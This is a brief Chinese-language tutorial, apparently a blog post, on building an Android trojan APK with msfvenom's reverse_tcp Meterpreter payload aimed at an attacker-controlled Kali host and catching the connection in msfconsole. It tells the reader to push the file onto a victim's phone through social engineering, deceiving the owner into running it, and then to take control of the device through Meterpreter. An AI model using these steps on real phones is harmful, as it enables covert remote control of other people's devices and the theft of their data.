實驗工具

1、VMware虛擬機器

2、Kali 2021 系統虛擬機器

3、Android手機

1、在VMware中開啟Kali 2021虛擬機器，確定Android手機的IP後進行【Ping】測試，確認Kali 2021能夠直接訪問Android手機。

2、確定能連通後，回到Kali 2021虛擬機器，開啟一個終端，準備進行手機木馬病毒檔案的製作，首先生成木馬檔案，需要用到MSF攻擊框架，輸入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST=Kali的IP地址 LPORT=Kali的埠號 R > 自定義檔名.apk】。

3、建立完成後，可以通過【社會工程學】上傳到Android手機中，並欺騙手機擁有者執行該程式。進行提權的前提是我們要有一個監聽程式，Kali 2021虛擬機器新建終端，進入MSF攻擊框架，輸入命令【msfconsole】。

4、設定偵聽模組，並配置攻擊載荷，這裡需要注意的是，攻擊載荷中的【LHOST】和【LPORT】要求和剛剛生成的木馬檔案的IP地址和埠號一致，否則攻擊失效。

5、攻擊載荷設定完畢後，輸入【exploit】執行，回到Android手機中執行剛剛安裝的.apk檔案，發現Kali 2021中的MSF框架跳轉到Meterpreter介面，證明提權成功，接下來可以通過Meterpreter命令控制Android手機。

知乎地址：https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
CSDN地址：https://blog.csdn.net/liu914589417
歡迎關注評論，耶斯莫拉